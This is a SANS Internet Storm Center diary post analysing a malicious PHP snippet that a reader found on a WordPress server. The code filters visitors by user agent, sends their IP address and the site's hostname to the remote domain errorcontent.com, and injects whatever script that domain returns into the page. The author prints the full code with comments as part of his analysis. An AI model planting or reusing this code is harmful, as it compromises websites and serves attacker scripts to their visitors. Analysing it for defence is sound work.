Threat Level: green Handler on Duty: Guy Bruneau

SANS ISC Internet Storm Center


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!

Latest Diaries

ISC StormCast for Wednesday, May 27th 2015 http://isc.sans.edu/podcastdetail.html?id=4501

Possible Wordpress Botnet C&C: errorcontent.com

Published: 2015-05-26
Last Updated: 2015-05-26 16:36:15 UTC
by Johannes Ullrich (Version: 1)
1 comment(s)

Thanks to one of our readers, for sending us this snipped of PHP he found on a Wordpress server (I added some line breaks and comments in red for readability):

 

#2b8008#   <-- no idea what this hex value does. I modified it in case it identifies the user submitting this to us.
error_reporting(0); /* turn off error reporting */
@ini_set('display_errors',0);  /* do not display errors to the user */
$wp_mezd8610 = @$_SERVER['HTTP_USER_AGENT']; /* retrieve the user agent string */


/* only run the code if this is Chrome or IE and not a "bot" */

if (( preg_match ('/Gecko|MSIE/i', $wp_mezd8610) && !preg_match ('/bot/i', $wp_mezd8610)))
{  

# Assemble a URL like http://errorcontent.com/content?ip=[client ip]&referer=[server host name]&ua=[user agent]

  $wp_mezd098610="http://"."error"."content".".com/"."content"."/?  ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_mezd8610);

# check if we have the curl extension installed 

if (function_exists('curl_init') && function_exists('curl_exec')) {

$ch= curl_init();
curl_setopt ($ch, CURLOPT_URL,$wp_mezd098610);
curl_setopt ($ch, CURLOPT_TIMEOUT, 20);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

$wp_8610mezd = curl_exec ($ch);
curl_close($ch);}

# if we don't have curl, try file_get_contents which requires allow_url_fopen.

elseif (function_exists('file_get_contents') && @ini_get('allow_url_fopen')) {$wp_8610mezd = @file_get_contents($wp_mezd098610);}

# or try fopen as a last resort
​elseif (function_exists('fopen') && function_exists('stream_get_contents')) {$wp_8610mezd=@stream_get_contents(@fopen($wp_mezd098610, "r"));}}

if (substr($wp_8610mezd,1,3) === 'scr'){ echo $wp_8610mezd; }

# The data retrieved will be echoed back to the user if it starts with the string "scr".

 

I haven't been able to retrieve any content from errorcontent.com. Has anybody else seen this code, or is able to retrieve content from errorcontent.com ?

According to whois, errorcontent.com is owned by a Chinese organization. It currently resolves to 37.1.207.26, which is owned by a british ISP. Any help as to the nature of this snippet will be appreciated.

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

Keywords:
1 comment(s)
Meet Johannes Ullrich at SANSFIRE!
ISC StormCast for Tuesday, May 26th 2015 http://isc.sans.edu/podcastdetail.html?id=4499

If you have more information or corrections regarding our diary, please share.

Recent Diaries

Business Value in "Big Data"
3 days ago by Guy (0 comments)

Exploit kits delivering Necurs
4 days ago by Brad Duncan (8 comments)

Logjam - vulnerabilities in Diffie-Hellman key exchange affect browsers and servers using TLS
6 days ago by Brad Duncan (11 comments)

Upatre/Dyre malspam - Subject: eFax message from "unknown"
6 days ago by Brad Duncan (5 comments)

Lazy Coordinated Attacks Against Old Vulnerabilities
4 decades ago by Dr. J. (1 comment)

View All Diaries →

Latest Discussions

Seeing increased activity against port 5060 on my home pfSense firewall via Snort
created 12 hours ago by Lee (0 replies)

Detecting the New Dridex Malware
created 4 days ago by Mostropi (0 replies)

What is the current Vulnerability targeted by Magnitude Exploit?
created 6 days ago by Mostropi (2 replies)

DShield-Top100 sources list vs the ASCII version
created 6 days ago by JamesW (1 reply)

Dshield shows "Rejected: Not an input block line"
created 1 week ago by Telserv (1 reply)

View All Forums →

Latest News

View All News →